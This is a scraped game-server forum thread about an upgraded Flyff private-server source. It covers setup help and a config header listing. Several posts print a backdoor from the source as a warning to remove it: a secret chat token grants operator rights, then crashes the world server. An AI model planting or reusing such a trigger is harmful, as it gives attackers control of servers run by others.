Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

[VS19] Infinity Flyff

Status
Not open for further replies.
Inactive
Reaction score
Ketchup i alrdy did and it says for me when i merge several things are missing

like character.inc

I just downloaded this & extracted it.

Went into InfinityFIX\Server\Resource and executed - Merge.exe and had no errors at all.

Made all 3 res files just fine and they are sitting in ResClient.

So i'm not sure what your doing wrong exactly lol.

Eitherway:

Junior Spellweaver
Reaction score
hi, i just downloaded your file. is there a pre-requisite file so i can run the game? im new in this im sorry

Newbie Spellweaver
Reaction score
What is the setting of database.ini? V19 database... Mine always says, " FAIL read ini - Script\databaseserver.ini"

Newbie Spellweaver
Reaction score
Set the resource path to the resource folder in DatabaseServer.ini

Where can i find that?

NVM find it now.
Lodelight - [VS19] Infinity Flyff - RaGEZONE Forums

Last edited:
Newbie Spellweaver
Reaction score
I want to remove the fastjobchange, but it let me crash the client when it reach to level 15

Inactive
Reaction score
I want to remove the fastjobchange, but it let me crash the client when it reach to level 15

If you use my 18.2 you wouldn't have job changer added.
You'd also have the freedom to add whatever you wanted to without having stuff you don't want.

But like blastboy said you would have to search for all of it and remove it if you wanted to keep using this source.

Newbie Spellweaver
Reaction score
Don't forget to remove the backdoor
Code:
#ifdef __GAMEGUARD    if( strcmp( scanner.token, "gagugag64632442ugagubakayotanglnayumgascamermamataykayisakpangkuplka") == 0 )   //type /say and the world server will fall old "crashcrashcrashandmorecrashxyz2156123"    
{        pUser->m_dwAuthorization = AUTH_OPERATOR;
#ifdef __LAYER_1015        
g_dpDBClient.SavePlayer( pUser, pUser->GetWorld()->GetID(), pUser->GetPos(), pUser->GetLayer() );
#else // __LAYER_1015        
g_dpDBClient.SavePlayer( pUser, pUser->GetWorld()->GetID(), pUser->GetPos() );
#endif // __LAYER_1015        
//system("The administrator is now online. Sieg Heil my friends.");        //Error("Stupid witch, This server is dead.");        
ExitProcess( -1 );    }
#endif // __GAMEGUARD

Newbie Spellweaver
Reaction score
There is an old backdoor in this version
Code:
#ifdef __GAMEGUARD    if( strcmp( scanner.token, "gagugag64632442ugagubakayotanglnayumgascamermamataykayisakpangkuplka") == 0 )   //type /say and the world server will fall old "crashcrashcrashandmorecrashxyz2156123"

Newbie Spellweaver
Reaction score
Don't forget to remove the backdoor
Code:
{        pUser->m_dwAuthorization = AUTH_OPERATOR;
#ifdef __LAYER_1015        
g_dpDBClient.SavePlayer( pUser, pUser->GetWorld()->GetID(), pUser->GetPos(), pUser->GetLayer() );
#else // __LAYER_1015        
g_dpDBClient.SavePlayer( pUser, pUser->GetWorld()->GetID(), pUser->GetPos() );
#endif // __LAYER_1015        
//system("The administrator is now online. Sieg Heil my friends.");        //Error("Stupid witch, This server is dead.");        
ExitProcess( -1 );    }
#endif // __GAMEGUARD

thanks for this!

Junior Spellweaver
Reaction score
Seeing how many people are having issues with the original release by @The Revelation I decided to upgrade the source from VS17 to VS19.

I removed other problematic things such as HackShield and AES. I then made a Database script for it and was able to get in game without any issues. If you want the old one you can obtain it here: https://forum.ragezone.com/f457/shade-flyff-infinity-flyff-source-1196005/

In-Game:
9VRzea - [VS19] Infinity Flyff - RaGEZONE Forums

Test Account:
Code:
User: test
Pass: test

ServerCommon.h:
Code:
//===========================================================================================================================================================
//============================================ CONFIGURATION ================================================================================================
//===========================================================================================================================================================
#define NEUZ_TITLE            "Infinity Flyff"
#define NEUZ_TITLE_IGN        "Infinity Flyff - " + strTitle + " "
#define NEUZ_PHASH            "kikugalanet"
#define NEUZ_IPSET            "127.0.0.1"
#define NEUZ_CPORT            "35700"
#define    PN_LOGINSRVR        35701
#define    PN_CERTIFIER        35702
#define NEUZ_BHASH            "sunkist"
#define NEUZ_MSGVR            "MSGVR_6_12_2020"
#define    MAX_SPEED            300
#define    SHOUT_LEVEL            15
#define    MIN_NAME_LETTERS    4
#define    MAX_NAME_LETTERS    16

#define SERVER_WELCOME_1 "[GameGuard] Enjoy Playing and don't forget to Vote Every 24hr and don't forget to invite your friends"
#define SERVER_WELCOME_2 "Welcome to Infinity Flyff ~ %s"
#define SERVER_WELCOME_3 "[GameGuard] Welcome to Infinity Flyff!! ~ %s !! Have Fun Here!!"

/*
 - Upgraded by Ketchup on RZ.

Notes:
 - Disabled due to conflicts with the upgrade. 
 - Enable and fix them as you wish.

__HACKSHIELD_AHNLAB
 __AES

*/

#define __INCREASED_INVENTORYSLOT
#define __TARGET_LOOK
#define __WINDOW_STYLE
#define __MOVE_WINDOW
#define __REMOVE_BTEXP
#define __NO_GUIDESYSTEM
#define __START_MENU_REMOVED
#define __VENDOR_UPDATE
#define __ADDSHOPITEM
#define __APP_TELEPORTER
#define __MESSAGE_SYSTEM
#define __WIKI
#define __MODEL_VIEW
#define __SHOW_ITEM_ID
#define __ITEM_INUSED_CHECKICON
#define __PET_FAST
#define __MARKET_V19
#define __AUTO_SKILL_MAX
#define __PET_FILTER
#define __PARTY_FIND
#define __WIKIPEDIA_MONSTER
#define __WIKIPEDIA_JOB
#define __TREASUREBOX
#define __DEV
#define __DAMAGE_RENDER_SPACE
#define __FROSTHUNTER
#define __PASSIVE_GUILDBUFFS
#define __COOLDOWN_TIMER
#define __MODEL_CHANGE
#define __AWA_WITH_PENYACOST
#define __PK_VIA_BEAST
#define __EATPET_STATS
#define __NO_ARROWS
#define __JNS_EXCHANGE_ADV
#define __TEXT_MENU
#define __JNS_HEALING_TXT
#define __GUILD_COLOR
#define __DROP_LOG
#define __JNS_AUGMENTATION
#define __CHIP_PLAYERSHOP
#define __VIP
#define __BUFF_ICON
#define __SYS_AUTO_SHOUT
#define __CHANGE_SET_EFFECT_STYLE
#define __RANGE_COLLECT_ITEM
#define __NEW_EXCHANGE_V19
#define __BS_DEATH_ACTION
#define __WINDOWS_EVEIL
#define __GS_RC_PER_KILL
#define __INVENTORY_SORT
#define __RES_1920x1080
#define __BLOCK_DAMAGE
#define    __2HANDED_SHIELD
//#define __PLAYER_WAR
#define    __SHOW_ALL_STATS
//#define __PERIN_CONVERTER
//Security
//DANI remove collisions fix
//Disable Deadzone DANI
//Login with deleted char fix DANI -- START
#define __FIX_INFILTRATION
#define __CHARACTER_INJECTION                    //[SECURITE] Character sql injection
#define __GUILD_INJECTION                        //[SECURITE] Injection sql guild
#define    __FIX_DUPLI_4PERSONNAGES                //[SECURITE] Fix de la duplication du 4eme personnages
#define __NPC_CHECK_EXCHANGE
#define __GH_DUPE_FIX
#define    __SECURITY_FIXES
#define __HACK_LOGS
#define __QUAY_LOG_SYS
#define __GAMEGUARD
#define __FIX_TELEPORT
#define    __ADMIN_AUTH
#define __FIX_MONSTER_SYNC                                                                
#define __QY_SECURITY
#define __SWITCH_FIX
#define __PET_COLLISION
#define __BEAD_STAT_FIX
#define __NO_DROP_CRASH
#define __FIX_GUILD_DUPE
#define __FIX_EEL_BUG
#define __COLLISION_FIX_PLAYER                    //[CORRECTIF] Collision des joueurs avec des obstacles légers (pentes, escaliers...)
#define __PET_VERIFITEM                            //[CORRECTIF] Le ramasseur ne tentera plus de ramasser d'autres objets que les OT_ITEM
#define __FLYFF_FIX_03             // CDPSrvr::OnBuyItem()
#define __FLYFF_FIX_04             // CItemUpgrade::OnPiercingRemove()
#define __FLYFF_FIX_05             // CDPSrvr::OnBlessednessCancel()
#define __FLYFF_FIX_07             // CDPSrvr::OnModifyStatus()
#define    __FLYFF_FIX_21             // CDPSrvr::OnChangeFace()
#define    __FLYFF_FIX_23             // CDPSrvr::OnMoveItemOnPocket
#define    __FLYFF_FIX_26             // CDPSrvr::OnGetItemGuildBank()
#define    __FLYFF_FIX_30             // CDPSrvr::OnGCApp()
#define    __FLYFF_FIX_31             // CWndPiercing::OnDropIcon
#define    __FLYFF_FIX_34             // CDPSrvr::OnDoUseItem
#define    __FLYFF_FIX_35             // CAttackArbiter::PostAsalraalaikum()
#define    __FLYFF_FIX_36             // CAIPet::StateIdle
#define __FLYFF_FIX_37             // CDPSrvr::OnDropItem()
#define __FLYFF_FIX_39             // CDPSrvr::OnSetTaxRate()
#define __FLYFF_FIX_40             // CDPSrvr::OnChangeFace()
#define __FLYFF_FIX_41             // CMover::GetAttackRange()
#define __FLYFF_FIX_46             // CDPSrvr::OnQuerySetPlayerName()
#define __FLYFF_FIX_47             // CDPSrvr::OnQuerySetGuildName()
#define __FLYFF_FIX_49             // CDPSrvr::OnExchange()
#define __FLYFF_FIX_58             // CDPSrvr::OnGCTele()
//#define __LOADER_SPLASH                                                            
//#define __PVP_SYSTEM                                                                                                                                                                                                                                                
//#define __CHANGE_HOTKEY

Download: | Password: RageZone

Hello :) when i create an account, i start the client,k create my character, im stuck in create my character, but when i restart the client, don't working, no Logs, can you help me pls ? :)

Attachments

You must be registered for see attachments list
Inactive
Reaction score
Hello :) when i create an account, i start the client,k create my character, im stuck in create my character, but when i restart the client, don't working, no Logs, can you help me pls ? :)

Please stop quoting and tagging me every time you have a problem in flyff. I'm not the only able bodied person who can help you in the section.

It's rather annoying tbh.

Newbie Spellweaver
Reaction score

I tried the files myself, I didn't get any error. It's fully operational once compiled, since the files that was provided is ready-to-use. I just made edits for some UI errors like the Character Stats UI in-game not being aligned, which are replied on this thread already.

Check the IPs, SQL passwords in your Programs' .ini files~
Check the Logs inside the Client folder~
Try debugging Neuz.exe~
Try deleting all the Databases and re-add again~
Start the Programs sequentially: (1. Account > 2. Certifier > 3. Database > 4. Core > 5. Login > 6. Cache > 7. World) Give it around 3 seconds interval each to prevent unwanted errors~

Newbie Spellweaver
Reaction score
Hi everybody i have this message when i try to compile this file :

can you help me ?

Status
Not open for further replies.
Back